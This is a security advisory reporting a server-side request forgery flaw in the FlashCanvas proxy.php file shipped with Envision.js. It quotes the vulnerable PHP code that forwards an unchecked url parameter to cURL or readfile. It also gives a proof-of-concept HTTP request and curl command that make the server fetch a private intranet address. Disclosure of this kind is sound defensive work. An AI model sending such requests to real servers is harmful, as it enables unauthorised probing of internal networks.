[Vuln] SSRF vulnerability in readile Function of proxy.php File (Envision.js latest version)

[zer0yu]

Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make requests to an unintended location.

Impact version: latest
Test with PHP 7.2

The vulnerable code is located in the readfile function of the lib/FlashCanvas/bin/proxy.php file, which does not perform sufficient checksumming of the url parameter, resulting in a taint introduced from the $_GET['url'] variable, and When the extension_loaded('curl') condition is not met, it enters the taint function readfile, which then sends a request to the URL specified by the url parameter, eventually leading to an SSRF vulnerability.

......
$url = str_replace($search, $replace, $_GET['url']);

// Disable compression
header('Content-Encoding: none');

// Load and output the file
if (extension_loaded('curl')) {
    // Use cURL extension
    $ch = curl_init($url);
    curl_exec($ch);
    curl_close($ch);
} else {
    // Use the http:// wrapper
    readfile($url);
}
......

Because the url parameter is unrestricted, it is also possible to use the server-side to send requests, such as probing intranet web services. The corresponding PoC is as follows

GET /proxy.php?url=http://172.16.119.1/proxypoc HTTP/1.1
Host: 172.16.119.1
Referer: #/flash123canvas.swf
Connection: close

You can also use the following curl command to verify the vulnerability

curl -i -s -k -X $'GET' \
    -H $'Host: 172.16.119.1:81' -H $'Referer: #/flash123canvas.swf' -H $'Connection: close' \
    $'http://172.16.119.1:81/proxy.php?url=http://172.16.119.1/readfilepoc'